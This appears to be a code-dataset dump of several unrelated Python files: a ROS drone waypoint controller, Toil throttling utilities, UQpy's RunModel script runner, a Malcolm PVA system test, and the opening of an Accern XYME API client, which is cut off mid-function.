source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
pattern.py | #! /usr/bin/env python
import rospy
from time import time, sleep
from datetime import datetime
from ar_track_alvar_msgs.msg import AlvarMarkers
from control import *
from callback import *
if __name__ == '__main__':
try:
rospy.init_node('control_node', anonymous= False)
rate = rospy.Rate(10)
AlvarMsg = rospy.wait_for_message('/ar_pose_marker', AlvarMarkers)
sleep(1)
receiveThread = threading.Thread(target=receive)
receiveThread.daemon = True
receiveThread.start()
send("command", 3)
send("takeoff", 8)
sleep(1)
count = 0
robot_in_pos = False
i = 0
sleep(1)
while not rospy.is_shutdown():
if count == 30:
send("land", 5)
print("Mission failed")
sock1.close()
rospy.signal_shutdown('End of testing')
else:
if not robot_in_pos:
AlvarMsg = rospy.wait_for_message('/ar_pose_marker', AlvarMarkers)
drone = get_drone_location(AlvarMsg)
if drone[0]['x'] != 0.0 and drone[1]['x'] != 0.0 and drone[2]['x'] != 0 and drone[3]['x'] != 0:
#rotate drone to initial angle
print('\r\nDrone Position:')
print('Drone_M[0] = (x: %.2f, y: %.2f)' % (drone[0]['x'], drone[0]['y']))
print('Drone_M[1] = (x: %.2f, y: %.2f)' % (drone[1]['x'], drone[1]['y']))
print('Drone_M[2] = (x: %.2f, y: %.2f)' % (drone[2]['x'], drone[2]['y']))
print('Drone_M[3] = (x: %.2f, y: %.2f)' % (drone[3]['x'], drone[3]['y']))
print('')
sleep(1)
robot_in_pos = True
else:
robot_in_pos = False
count += 1
else:
#update the drone's current position
AlvarMsg = rospy.wait_for_message('/ar_pose_marker', AlvarMarkers)
drone = get_drone_location(AlvarMsg)
print ("drone x: %3.3f , drone y: %3.3f" % (drone_x, drone_y))
status = move_xy(goal_x[i], goal_y[i], drone_x, drone_y)
sleep(1)
if status == 'Goal Position reached':
print("Mission completed successfully!")
robot_in_pos = False
i += 1
if i == 3: #No. of goals
robot_in_pos = False
send("land", 5)
print("Mission completed successfully!")
sock1.close()
rospy.signal_shutdown('End of testing')
else:
count += 1
drone_x, drone_y = (0.0, 0.0)
goal_x[i], goal_y[i] = (0.0, 0.0)
robot_in_pos = False
except rospy.ROSInterruptException:
send("land", 5)
sock1.close()
print('Simulation terminated')
pass |
throttle.py | # Copyright (C) 2015-2018 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# 5.14.2018: copied into Toil from https://github.com/BD2KGenomics/bd2k-python-lib
from __future__ import absolute_import
from builtins import object
import time
import threading
from toil.lib.threading import BoundedEmptySemaphore
class GlobalThrottle(object):
"""
A thread-safe rate limiter that throttles all threads globally. This should be used to
regulate access to a global resource. It can be used as a function/method decorator or as a
simple object, using the throttle() method. The token generation starts with the first call
to throttle() or the decorated function. Each subsequent call to throttle() will then acquire
a token, possibly having to wait until one becomes available. The number of unused tokens
will not exceed a limit given at construction time. This is a very basic mechanism to
prevent the resource from becoming swamped after longer pauses.
"""
def __init__( self, min_interval, max_unused ):
self.min_interval = min_interval
self.semaphore = BoundedEmptySemaphore( max_unused )
self.thread_start_lock = threading.Lock( )
self.thread_started = False
self.thread = threading.Thread( target=self.generator )
self.thread.daemon = True
def generator( self ):
while True:
try:
self.semaphore.release( )
except ValueError:
pass
time.sleep( self.min_interval )
def throttle( self, wait=True ):
"""
If the wait parameter is True, this method returns True after suspending the current
thread as necessary to ensure that no less than the configured minimum interval passed
since the most recent time an invocation of this method returned True in any thread.
If the wait parameter is False, this method immediatly returns True if at least the
configured minimum interval has passed since the most recent time this method returned
True in any thread, or False otherwise.
"""
# I think there is a race in Thread.start(), hence the lock
with self.thread_start_lock:
if not self.thread_started:
self.thread.start( )
self.thread_started = True
return self.semaphore.acquire( blocking=wait )
def __call__( self, function ):
def wrapper( *args, **kwargs ):
self.throttle( )
return function( *args, **kwargs )
return wrapper
class LocalThrottle(object):
"""
A thread-safe rate limiter that throttles each thread independently. Can be used as a
function or method decorator or as a simple object, via its .throttle() method.
The use as a decorator is deprecated in favor of throttle().
"""
def __init__( self, min_interval ):
"""
Initialize this local throttle.
:param min_interval: The minimum interval in seconds between invocations of the throttle
method or, if this throttle is used as a decorator, invocations of the decorated method.
"""
self.min_interval = min_interval
self.per_thread = threading.local( )
self.per_thread.last_invocation = None
def throttle( self, wait=True ):
"""
If the wait parameter is True, this method returns True after suspending the current
thread as necessary to ensure that no less than the configured minimum interval has
passed since the last invocation of this method in the current thread returned True.
If the wait parameter is False, this method immediatly returns True (if at least the
configured minimum interval has passed since the last time this method returned True in
the current thread) or False otherwise.
"""
now = time.time( )
last_invocation = self.per_thread.last_invocation
if last_invocation is not None:
interval = now - last_invocation
if interval < self.min_interval:
if wait:
remainder = self.min_interval - interval
time.sleep( remainder )
else:
return False
self.per_thread.last_invocation = now
return True
def __call__( self, function ):
def wrapper( *args, **kwargs ):
self.throttle( )
return function( *args, **kwargs )
return wrapper
class throttle(object):
"""
A context manager for ensuring that the execution of its body takes at least a given amount
of time, sleeping if necessary. It is a simpler version of LocalThrottle if used as a
decorator.
Ensures that body takes at least the given amount of time.
>>> start = time.time()
>>> with throttle(1):
... pass
>>> 1 <= time.time() - start <= 1.1
True
Ditto when used as a decorator.
>>> @throttle(1)
... def f():
... pass
>>> start = time.time()
>>> f()
>>> 1 <= time.time() - start <= 1.1
True
If the body takes longer by itself, don't throttle.
>>> start = time.time()
>>> with throttle(1):
... time.sleep(2)
>>> 2 <= time.time() - start <= 2.1
True
Ditto when used as a decorator.
>>> @throttle(1)
... def f():
... time.sleep(2)
>>> start = time.time()
>>> f()
>>> 2 <= time.time() - start <= 2.1
True
If an exception occurs, don't throttle.
>>> start = time.time()
>>> try:
... with throttle(1):
... raise ValueError('foo')
... except ValueError:
... end = time.time()
... raise
Traceback (most recent call last):
...
ValueError: foo
>>> 0 <= end - start <= 0.1
True
Ditto when used as a decorator.
>>> @throttle(1)
... def f():
... raise ValueError('foo')
>>> start = time.time()
>>> try:
... f()
... except ValueError:
... end = time.time()
... raise
Traceback (most recent call last):
...
ValueError: foo
>>> 0 <= end - start <= 0.1
True
"""
def __init__( self, min_interval ):
self.min_interval = min_interval
def __enter__( self ):
self.start = time.time( )
def __exit__( self, exc_type, exc_val, exc_tb ):
if exc_type is None:
duration = time.time( ) - self.start
remainder = self.min_interval - duration
if remainder > 0:
time.sleep( remainder )
def __call__( self, function ):
def wrapper( *args, **kwargs ):
with self:
return function( *args, **kwargs )
return wrapper
|
RunModel.py | import os
import numpy as np
import sys
class RunModel:
"""
A class used to run a computational model a specified sample points.
This class takes samples, either passed as a variable or read through a text file, and runs a specified
computational model at those sample points. This can be done by either passing variables and running entirely in
python or by calling shell scripts that run a third-party software model.
Input:
:param samples: The sample values at which the model will be evaluated. Samples can be passed directly as an array
or can be passed through the text file 'UQpy_Samples.txt'. If passing samples via text file, set
samples = None or do not set the samples input.
:type samples: numpy array
:param dimension: The dimension of the random variable whose samples are being passed to the model.
:type dimension: int
:param model_type: Define the model as a python file or as a third party software model (e.g. Matlab, Abaqus, etc.)
Options: None - Run a third party software model
'python' - Run a python model. When selected, the python file must contain a class RunPythonModel
that takes, as input, samples and dimension and returns quantity of interest (qoi) in
in list form where there is one item in the list per sample. Each item in the qoi list
may take type the user prefers.
Default: None
:type model_type: str
:param model_script: Defines the script (must be either a shell script (.sh) or a python script (.py)) used to call
the model.
This is a user-defined script that must be provided.
If model_type = 'python', this must be a python script (.py) having a specified class
structure. Details on this structure can be found in the UQpy documentation.
:type: model_script: str
:param input_script: Defines the script (must be either a shell script (.sh) or a python script (.py)) that takes
samples generated by UQpy from the sample file generated by UQpy (UQpy_run_{0}.txt) and
imports them into a usable input file for the third party solver. Details on
UQpy_run_{0}.txt can be found in the UQpy documentation.
If model_type = None, this is a user-defined script that the user must provide.
If model_type = 'python', this is not used.
:type: input_script: str
:param output_script: (Optional) Defines the script (must be either a shell script (.sh) or python script (.py))
that extracts quantities of interest from third-party output files and saves them to a file
(UQpy_eval_{}.txt) that can be read for postprocessing and adaptive sampling methods by
UQpy.
If model_type = None, this is an optional user-defined script. If not provided, all run files
and output files will be saved in the folder 'UQpyOut' placed in the current working
directory. If provided, the text files UQpy_eval_{}.txt are placed in this directory and all
other files are deleted.
If model_type = 'python', this is not used.
:type output_script: str
:param cpu: Number of CPUs over which to run the job.
UQpy distributes the total number of model evaluations over this number of CPUs
Default: 1 - Runs serially
:type cpu: int
Output:
:param model_eval: An instance of a sub-class that contains the model solutions. Depending on how the model is run,
model_eval is an instance of a different class.
If model_type = 'python', model_eval is an instance of the class RunPythonModel defined in the
python model_script.
If model_type = 'None' and cpu <= 1, model_eval is an instance of the class RunSerial
If model_type = 'None' and cpu > 1, model_eval is an instance of the class RunParallel
Regardless of model_type, model_eval has the following key attributes:
model_eval.samples = Sample values at which the model has been run.
model_eval.QOI = Solution of the model at each sample value.
:type: model_eval: The two key attributes of model_eval have the following type.
model_eval.samples = numpy array
model_eval.QOI = list
"""
# Authors: Dimitris Giovanis, Michael D. Shields
# Updated: 5/1/18 by Michael D. Shields & Dimitris Giovanis
def __init__(self, samples=None, dimension=None, model_type=None, model_script=None, input_script=None,
output_script=None, cpu=None):
self.CPUs = cpu
self.model_type = model_type
self.model_script = model_script
self.input_script = input_script
self.output_script = output_script
self.dimension = dimension
self.model_eval = []
# If samples=None, then samples must be imported from UQpy_Samples.txt. Load the file and assign the samples to
# 'self.samples'. Otherwise, read the samples as input.
if samples is None and os.path.isfile('UQpy_Samples.txt'):
self.samples = np.loadtxt('UQpy_Samples.txt', dtype=np.float32)
if self.samples.ndim == 1:
if self.dimension == 1:
self.samples = self.samples.reshape(self.samples.shape[0], self.dimension)
else:
self.samples = self.samples.reshape(1, self.samples.shape[0])
elif samples is not None:
self.samples = samples
else:
raise ValueError('Samples must be provided either as input to RunModel or from UQpy_Samples.txt')
################################################################################################################
# Run a python model by importing the user-specified model_script file
# model_script must contain a class RunPythonModel - See documentation for details.
if self.model_type == 'python':
# Check that the script is a python file
if not self.model_script.lower().endswith('.py'):
raise ValueError('A python script, with extension .py, must be provided.')
model_script = self.model_script[:-3]
python_model = __import__(model_script)
print("\nEvaluating the model...\n")
self.model_eval = python_model.RunPythonModel(self.samples,self.dimension)
################################################################################################################
# Run a third-party software model with file-passing
elif self.model_type is None:
import shutil
current_dir = os.getcwd()
############################################################################################################
# Create a unique temporary directory 'tmp'.
# Run the model from this directory.
# Move the data generated by the model to the directory 'UQpyOut'
# Remove 'tmp' after completion.
folder_name = 'UQpyOut'
output_directory = os.path.join(os.sep, current_dir, folder_name)
# Create a list of all of the working files
model_files = list()
for fname in os.listdir(current_dir):
path = os.path.join(current_dir, fname)
if not os.path.isdir(path):
model_files.append(path)
# Create tmp directory
dir_path = os.path.join(current_dir, 'tmp')
if os.path.exists(dir_path) and os.path.isdir(dir_path):
shutil.rmtree(dir_path)
os.makedirs('tmp', exist_ok=False)
work_dir = os.path.join(os.sep, current_dir, 'tmp')
# Copy files from the model list to tmp
for file_name in model_files:
full_file_name = os.path.join(current_dir, file_name)
shutil.copy(full_file_name, work_dir)
# Change current working directory to tmp
os.chdir(os.path.join(current_dir, work_dir))
# Check for parallel or serial processing
if self.CPUs != 1 and self.CPUs is not None:
parallel_processing = True
import multiprocessing
n_cpu = multiprocessing.cpu_count()
if self.CPUs > n_cpu:
print("Error: You have available {0:1d} CPUs. Start parallel computing ..."
"using {0:1d} CPUs".format(n_cpu))
self.CPUs = n_cpu
else:
parallel_processing = False
# Run the model
print("\nEvaluating the model...\n")
if parallel_processing is True:
self.model_eval = self.RunParallel(samples=self.samples, cpu=self.CPUs, dimension=self.dimension,
model_script=self.model_script, input_script=self.input_script,
output_script=self.output_script)
else:
if self.output_script is not None:
self.model_eval = self.RunSerial(samples=self.samples, dimension=self.dimension,
model_script=self.model_script, input_script=self.input_script,
output_script=self.output_script)
else:
self.RunSerial(self.samples)
# Move the data to directory UQpyOut
os.makedirs(output_directory, exist_ok=True)
path = os.path.join(current_dir, work_dir)
if self.output_script is not None:
src_files = [filename for filename in os.listdir(path) if filename.startswith("UQpy_eval_")]
for file_name in src_files:
full_file_name = os.path.join(path, file_name)
shutil.copy(full_file_name, output_directory)
else:
src_files = [filename for filename in os.listdir(path)]
for file_name in src_files:
full_file_name = os.path.join(path, file_name)
shutil.copy(full_file_name, output_directory)
# Delete the tmp working directory
shutil.rmtree(work_dir)
os.chdir(current_dir)
####################################################################################################################
class RunSerial:
"""
A subclass of RunModel to run a third-party software model serially (without parallel processing).
Most attributes of this subclass are inherited from RunModel. The only variable that is not inherited is QOI.
Input:
:param samples: Inherited from RunModel. See its documentation.
:type samples: numpy array
:param dimension: Inherited from RunModel. See its documentation.
:type dimension: int
:param model_script: Inherited from RunModel. See its documentation.
:type: model_script: str
:param input_script: Inherited from RunModel. See its documentation.
:type: input_script: str
:param output_script: Inherited from RunModel. See its documentation.
:type output_script: str
Output:
:param QOI: List containing the Quantity of Interest from the simulations
Each item in the list corresponds to one simulation
:type QOI: list
Each item in the list may be of arbitrary data type (e.g. int, float, nparray, etc.)
"""
# Authors: Dimitris Giovanis, Michael D. Shields
# Updated: 5/1/18 by Michael D. Shields & Dimitris Giovanis
def __init__(self, samples=None, dimension=None, model_script=None, input_script=None, output_script=None):
self.dimension = dimension
self.model_script = model_script
self.input_script = input_script
self.output_script = output_script
self.samples = samples
self.QOI = []
for i in range(self.samples.shape[0]):
# Write each value of UQpy_Samples.txt (self.samples) into a separate *.txt file
with open('UQpy_run_{0}.txt'.format(i), 'wb') as f:
np.savetxt(f, self.samples[i, :], fmt='%0.5f')
# Run input_script to create the input file for the model
# input_script is a user defined script that converts UQpy_run_{0}.txt into a usable input file for
# third party software.
if self.input_script.lower().endswith('.sh'):
join_input_script = './{0} {1}'.format(self.input_script, i)
os.system(join_input_script)
elif self.input_script.lower().endswith('.py'):
join_input_script = 'python {0} {1}'.format(self.input_script, i)
os.system(join_input_script)
else:
print('Unrecognized script type. Options are shell script (.sh) or python script (.py).')
sys.exit()
# Run model_script to run the model
# model_script is a user defined script that calls the third-party model.
if self.model_script.lower().endswith('.sh'):
join_model_script = './{0} {1}'.format(self.model_script, i)
os.system(join_model_script)
elif self.model_script.lower().endswith('.py'):
join_model_script = 'python {0} {1}'.format(self.model_script, i)
os.system(join_model_script)
else:
print('Unrecognized script type. Options are shell script (.sh) or python script (.py).')
sys.exit()
if self.output_script is not None:
# Run output_script to extract output of interest from model output files.
if self.output_script.lower().endswith('.sh'):
join_output_script = './{0} {1}'.format(self.output_script, i)
os.system(join_output_script)
elif self.output_script.lower().endswith('.py'):
join_output_script = 'python {0} {1}'.format(self.output_script, i)
os.system(join_output_script)
else:
print('Unrecognized script type. Options are shell script (.sh) or python script (.py).')
sys.exit()
# Save the results from each simulation to a separate text file
self.QOI.append(np.loadtxt('UQpy_eval_{}.txt'.format(i)))
####################################################################################################################
class RunParallel:
"""
A subclass of RunModel to run a third-party software model with parallel processing.
Most attributes of this subclass are inhereted from RunModel. The only variable that is not inherited is QOI.
Input:
:param samples: Inherited from RunModel. See its documentation.
:type samples: numpy array
:param dimension: Inherited from RunModel. See its documentation.
:type dimension: int
:param model_script: Inherited from RunModel. See its documentation.
:type: model_script: str
:param input_script: Inherited from RunModel. See its documentation.
:type: input_script: str
:param output_script: Inherited from RunModel. See its documentation.
:type output_script: str
Output:
:param QOI: List containing the Quantity of Interest from the simulations
Each item in the list corresponds to one simulation
:type QOI: list
Each item in the list may be of arbitrary data type (e.g. int, float, nparray, etc.)
"""
# Authors: Dimitris Giovanis, Michael D. Shields
# Updated: 5/1/18 by Michael D. Shields & Dimitris Giovanis
def __init__(self, samples=None, cpu=None, model_script=None, input_script=None, output_script=None,
dimension=None):
self.samples = samples
self.dimension = dimension
self.CPUs = cpu
self.model_script = model_script
self.input_script = input_script
self.output_script = output_script
from multiprocessing import Process
from multiprocessing import Queue
jobs_per_cpu = int(np.floor(self.samples.shape[0]/self.CPUs))
jobs_remaining = np.mod(self.samples.shape[0],self.CPUs)
if jobs_per_cpu == 0:
self.CPUs = jobs_remaining
print('The number of CPUs used is {}\n '.format(self.CPUs))
# Break the simulation set into sets to be run over each CPU
[batches, batch_ind] = self.chunk_samples_cpus()
# Initialize the parallel processing queue and processes
que = Queue()
jobs = [Process(target=self.run_parallel_model, args=(batch_ind[a], que)) for a in
range(self.CPUs)]
# Start the parallel processes.
for j in jobs:
j.start()
for j in jobs:
j.join()
# Collect the results from the processes and sort them into the original sample order.
self.QOI = [None]*self.samples.shape[0]
results = [que.get(j) for j in jobs]
for i in range(self.CPUs):
k = 0
for j in results[i][0]:
self.QOI[j] = results[i][1][k]
k = k+1
################################################################################################################
# Function to call the model
def run_parallel_model(self, job_inds, que):
if self.samples.size == 1:
self.samples = self.samples.reshape(1, 1)
if len(self.samples.shape) == 1 and self.dimension != 1:
self.samples = self.samples.reshape(1, self.samples.shape[0])
elif len(self.samples.shape) == 1 and self.dimension == 1:
self.samples = self.samples.reshape(self.samples.shape[0], 1)
model_eval = list()
for i in job_inds:
# Write each value of UQpyOut.txt into a *.txt file
np.savetxt('UQpy_run_{0}.txt'.format(int(i)), self.samples[i, :], newline=' ', delimiter=',',
fmt='%0.5f')
# Run the input script to convert UQpy_run_X.txt to a valid model input
if self.input_script.lower().endswith('.sh'):
join_input_script = './{0} {1}'.format(self.input_script, int(i))
os.system(join_input_script)
else:
print('Unrecognized type of input file script. Must be .sh')
sys.exit()
# Run the third-party model script (model_script)
if self.model_script.lower().endswith('.sh'):
join_model_script = './{0} {1}'.format(self.model_script, int(i))
os.system(join_model_script)
else:
print('Unrecognized type of model file')
sys.exit()
# Run the output script to convert model results to UQpy_eval_X.txt to be read by UQpy
if self.output_script.lower().endswith('.sh'):
join_output_script = './{0} {1}'.format(self.output_script, int(i))
os.system(join_output_script)
else:
print('Unrecognized type of Input file')
sys.exit()
model_eval.append(np.loadtxt('UQpy_eval_{0}.txt'.format(int(i))))
src_files = 'UQpy_eval_{0}.txt'.format(int(i))
file_new = src_files.replace("UQpy_eval_{0}.txt".format(int(i)), "Model_{0}.txt".format(int(i)))
os.rename(src_files, file_new)
model_eval = que.put([job_inds, model_eval])
return model_eval
################################################################################################################
# Chunk the samples into batches
def chunk_samples_cpus(self):
size_ = np.array([np.ceil(self.samples.shape[0]/self.CPUs) for i in range(self.CPUs)]).astype(int)
dif = np.sum(size_) - self.samples.shape[0]
for k in range(dif):
size_[k] = size_[k] - 1
batches = [None]*self.CPUs
batch_ind = [None]*self.CPUs
for i in range(self.CPUs):
if i == 0:
batch_ind[i] = range(size_[i])
else:
batch_ind[i] = range(int(np.sum(size_[:i])), int(np.sum(size_[:i+1])))
batches[i] = self.samples[batch_ind[i], :]
return batches, batch_ind
# This code may be used in the future to extend for distributed computing for HPC use.
# def chunk_samples_nodes(samples, args):
#
# # In case of cluster divide the samples into chunks in order to sent to each processor
# chunks = args.nodes
# size = np.array([np.ceil(samples.shape[0]/chunks) in range(args.nodes)]).astype(int)
# dif = np.sum(size) - samples.shape[0]
# count = 0
# for k in range(dif):
# size[count] = size[count] - 1
# count = count + 1
# for i in range(args.nodes):
# if i == 0:
# lines = range(0, size[i])
# else:
# lines = range(int(np.sum(size[:i])), int(np.sum(size[:i+1])))
#
# np.savetxt('UQpy_Batch_{0}.txt'.format(i+1), samples[lines, :], fmt='%0.5f')
# np.savetxt('UQpy_Batch_index_{0}.txt'.format(i+1), lines) |
test_system_pva.py | import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), "..", ".."))
import multiprocessing
import unittest
# module imports
def p1(q):
import logging
logging.basicConfig(level=logging.DEBUG)
from malcolm.core import call_with_params, Context
from malcolm.blocks.demo import hello_block, counter_block
from malcolm.blocks.pva import pva_server_block
process = Process("proc")
call_with_params(hello_block, process, mri="hello")
call_with_params(counter_block, process, mri="counter2")
call_with_params(pva_server_block, process, mri="server")
context = Context(process)
process.start()
while True:
try:
q.get(timeout=0.01)
except Exception as e:
context.sleep(0.1)
else:
process.stop(timeout=1)
return
class TestSystemPVACommsServerAndClient(unittest.TestCase):
def setUp(self):
self.mp_q = multiprocessing.Queue()
self.mp = multiprocessing.Process(target=p1, args=(self.mp_q,))
self.mp.start()
from malcolm.core import Process, call_with_params
from malcolm.blocks.pva import pva_client_block
self.process2 = Process("proc2")
self.client = call_with_params(
pva_client_block, self.process2, mri="client")
self.process2.start()
def tearDown(self):
self.process2.stop(timeout=1)
self.mp_q.put(None)
self.mp.join()
def s_server_hello_with_malcolm_client(self):
from malcolm.core import call_with_params, Context, ResponseError
from malcolm.blocks.builtin import proxy_block
call_with_params(
proxy_block, self.process2, mri="hello", comms="client")
context = Context(self.process2)
context.when_matches(["hello", "health", "value"], "OK", timeout=2)
block2 = self.process2.block_view("hello")
ret = block2.greet(name="me2")
assert ret == dict(greeting="Hello me2")
with self.assertRaises(ResponseError):
block2.error()
#def test_server_counter_with_malcolm_client(self):
# from malcolm.core import call_with_params, Context
# from malcolm.blocks.builtin import proxy_block
# call_with_params(
# proxy_block, self.process2, mri="counter2", comms="client")
# context = Context("context", self.process2)
# context.when_matches(["counter2", "health", "value"], "OK", timeout=2)
# context.sleep(3)
# block2 = self.process2.block_view("counter2")
# block2.zero()
# self.assertEqual(block2.counter.value, 0)
# block2.increment()
# self.assertEqual(block2.counter.value, 1)
# block2.zero()
# self.assertEqual(block2.counter.value, 0)
# assert self.client.remote_blocks.value == (
# "hello", "counter", "server")
if __name__ == "__main__":
from malcolm.core import Queue, Process
q = Queue()
p1(q)
|
accern_xyme.py | from typing import (
Any,
Callable,
cast,
Dict,
IO,
Iterable,
Iterator,
List,
Optional,
overload,
Set,
TextIO,
Tuple,
TYPE_CHECKING,
Union,
)
import io
import os
import sys
import json
import time
import weakref
import inspect
import textwrap
import threading
import contextlib
import collections
from io import BytesIO, StringIO
import pandas as pd
import requests
from requests import Response
from requests.exceptions import HTTPError, RequestException
from typing_extensions import Literal
import quick_server
from accern_xyme.v3.util import (
async_compute,
ByteResponse,
df_to_csv,
get_age,
get_file_hash,
get_file_upload_chunk_size,
get_max_retry,
get_progress_bar,
get_retry_sleep,
interpret_ctype,
merge_ctype,
safe_opt_num,
ServerSideError,
)
from accern_xyme.v3.types import (
BlobInit,
BlobOwner,
CacheStats,
CopyBlob,
CSVBlobResponse,
CSVList,
CSVOp,
CustomCodeResponse,
CustomImportsResponse,
DynamicResults,
DynamicStatusResponse,
ESQueryResponse,
FlushAllQueuesResponse,
InCursors,
InstanceStatus,
JobInfo,
JobList,
JSONBlobResponse,
KafkaGroup,
KafkaMessage,
KafkaOffsets,
KafkaThroughput,
KafkaTopics,
ListNamedSecretKeys,
MaintenanceResponse,
MinimalQueueStatsResponse,
ModelParamsResponse,
ModelReleaseResponse,
ModelSetupResponse,
NodeChunk,
NodeDef,
NodeDefInfo,
NodeInfo,
NodeState,
NodeStatus,
NodeTiming,
NodeTypes,
PipelineCreate,
PipelineDef,
PipelineDupResponse,
PipelineInfo,
PipelineInit,
PipelineList,
PipelineReload,
PutNodeBlob,
QueueMode,
QueueStatsResponse,
QueueStatus,
ReadNode,
SetNamedSecret,
TaskStatus,
Timing,
TimingResult,
Timings,
UserColumnsResponse,
VersionResponse,
VisibleBlobs,
WorkerScale,
)
if TYPE_CHECKING:
WVD = weakref.WeakValueDictionary[str, 'PipelineHandle']
else:
WVD = weakref.WeakValueDictionary
API_VERSION = 3
METHOD_DELETE = "DELETE"
METHOD_FILE = "FILE"
METHOD_GET = "GET"
METHOD_LONGPOST = "LONGPOST"
METHOD_POST = "POST"
METHOD_PUT = "PUT"
PREFIX = "/xyme"
INPUT_CSV_EXT = ".csv"
INPUT_TSV_EXT = ".tsv"
INPUT_ZIP_EXT = ".zip"
INPUT_EXT = [INPUT_ZIP_EXT, INPUT_CSV_EXT, INPUT_TSV_EXT]
FUNC = Callable[[Any], Any]
CUSTOM_NODE_TYPES = {
"custom_data",
"custom_json",
"custom_json_to_data",
"custom_json_join_data",
}
EMBEDDING_MODEL_NODE_TYPES = {
"dyn_embedding_model",
"static_embedding_model",
}
MODEL_NODE_TYPES = EMBEDDING_MODEL_NODE_TYPES
class AccessDenied(Exception):
pass
# *** AccessDenied ***
class LegacyVersion(Exception):
pass
# *** LegacyVersion ***
class XYMEClientV3:
def __init__(
self,
url: str,
token: Optional[str]) -> None:
self._url = url.rstrip("/")
if token is None:
token = os.environ.get("XYME_SERVER_TOKEN")
self._token = token
self._last_action = time.monotonic()
self._auto_refresh = True
self._pipeline_cache: WVD = weakref.WeakValueDictionary()
self._permissions: Optional[List[str]] = None
self._node_defs: Optional[Dict[str, NodeDefInfo]] = None
def get_version() -> int:
server_version = self.get_server_version()
try:
return int(server_version["api_version"])
except (ValueError, KeyError) as e:
raise LegacyVersion() from e
self._api_version = min(get_version(), API_VERSION)
def get_api_version(self) -> int:
return self._api_version
def get_permissions(self) -> List[str]:
if self._permissions is None:
raise NotImplementedError("permissions are not implemented")
assert self._permissions is not None
return self._permissions
def set_auto_refresh(self, is_auto_refresh: bool) -> None:
self._auto_refresh = is_auto_refresh
def is_auto_refresh(self) -> bool:
return self._auto_refresh
def refresh(self) -> None:
self._node_defs = None
def _maybe_refresh(self) -> None:
if self.is_auto_refresh():
self.refresh()
@contextlib.contextmanager
def bulk_operation(self) -> Iterator[bool]:
old_refresh = self.is_auto_refresh()
try:
self.set_auto_refresh(False)
yield old_refresh
finally:
self.set_auto_refresh(old_refresh)
def _raw_request_bytes(
self,
method: str,
path: str,
args: Dict[str, Any],
files: Optional[Dict[str, BytesIO]] = None,
add_prefix: bool = True,
api_version: Optional[int] = None) -> Tuple[BytesIO, str]:
file_resets = {}
can_reset = True
if files is not None:
for (fname, fbuff) in files.items():
if hasattr(fbuff, "seek"):
file_resets[fname] = fbuff.seek(0, io.SEEK_CUR)
else:
can_reset = False
def reset_files() -> bool:
if files is None:
return True
if not can_reset:
return False
for (fname, pos) in file_resets.items():
files[fname].seek(pos, io.SEEK_SET)
return True
retry = 0
max_retry = get_max_retry()
while True:
try:
try:
return self._fallible_raw_request_bytes(
method, path, args, files, add_prefix, api_version)
except HTTPError as e:
if e.response.status_code in (403, 404, 500):
retry = max_retry
raise e
except RequestException:
if retry >= max_retry:
raise
if not reset_files():
raise
time.sleep(get_retry_sleep())
retry += 1
def _raw_request_str(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool = True,
api_version: Optional[int] = None) -> TextIO:
retry = 0
max_retry = get_max_retry()
while True:
try:
try:
return self._fallible_raw_request_str(
method, path, args, add_prefix, api_version)
except HTTPError as e:
if e.response.status_code in (403, 404, 500):
retry = max_retry
raise e
except RequestException:
if retry >= max_retry:
raise
time.sleep(get_retry_sleep())
retry += 1
def _raw_request_json(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool = True,
files: Optional[Dict[str, IO[bytes]]] = None,
api_version: Optional[int] = None) -> Dict[str, Any]:
file_resets = {}
can_reset = True
if files is not None:
for (fname, fbuff) in files.items():
if hasattr(fbuff, "seek"):
file_resets[fname] = fbuff.seek(0, io.SEEK_CUR)
else:
can_reset = False
def reset_files() -> bool:
if files is None:
return True
if not can_reset:
return False
for (fname, pos) in file_resets.items():
files[fname].seek(pos, io.SEEK_SET)
return True
retry = 0
max_retry = get_max_retry()
while True:
try:
try:
return self._fallible_raw_request_json(
method, path, args, add_prefix, files, api_version)
except HTTPError as e:
if e.response.status_code in (403, 404, 500):
retry = max_retry
raise e
except RequestException:
if retry >= max_retry:
raise
if not reset_files():
raise
time.sleep(get_retry_sleep())
retry += 1
def _fallible_raw_request_bytes(
self,
method: str,
path: str,
args: Dict[str, Any],
files: Optional[Dict[str, BytesIO]],
add_prefix: bool,
api_version: Optional[int]) -> Tuple[BytesIO, str]:
prefix = ""
if add_prefix:
if api_version is None:
api_version = self._api_version
prefix = f"{PREFIX}/v{api_version}"
url = f"{self._url}{prefix}{path}"
headers = {
"authorization": self._token,
}
def check_error(req: Response) -> None:
if req.status_code == 403:
raise AccessDenied(req.text)
req.raise_for_status()
# NOTE: no content type check -- will be handled by interpret_ctype
if method == METHOD_GET:
req = requests.get(url, params=args, headers=headers)
check_error(req)
return BytesIO(req.content), req.headers["content-type"]
if method == METHOD_POST:
req = requests.post(url, json=args, headers=headers)
check_error(req)
return BytesIO(req.content), req.headers["content-type"]
if method == METHOD_FILE:
if files is None:
raise ValueError(f"file method must have files: {files}")
req = requests.post(
url,
data=args,
files={
key: (
getattr(value, "name", key),
value,
"application/octet-stream",
) for (key, value) in files.items()
},
headers=headers)
check_error(req)
return BytesIO(req.content), req.headers["content-type"]
raise ValueError(f"unknown method {method}")
def _fallible_raw_request_str(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool,
api_version: Optional[int]) -> TextIO:
prefix = ""
if add_prefix:
if api_version is None:
api_version = self._api_version
prefix = f"{PREFIX}/v{api_version}"
url = f"{self._url}{prefix}{path}"
headers = {
"authorization": self._token,
}
def check_error(req: Response) -> None:
if req.status_code == 403:
raise AccessDenied(req.text)
req.raise_for_status()
if req.headers["content-type"] == "application/problem+json":
raise ServerSideError(json.loads(req.text)["errMessage"])
if method == METHOD_GET:
req = requests.get(url, params=args, headers=headers)
check_error(req)
return StringIO(req.text)
if method == METHOD_POST:
req = requests.post(url, json=args, headers=headers)
check_error(req)
return StringIO(req.text)
raise ValueError(f"unknown method {method}")
def _fallible_raw_request_json(
self,
method: str,
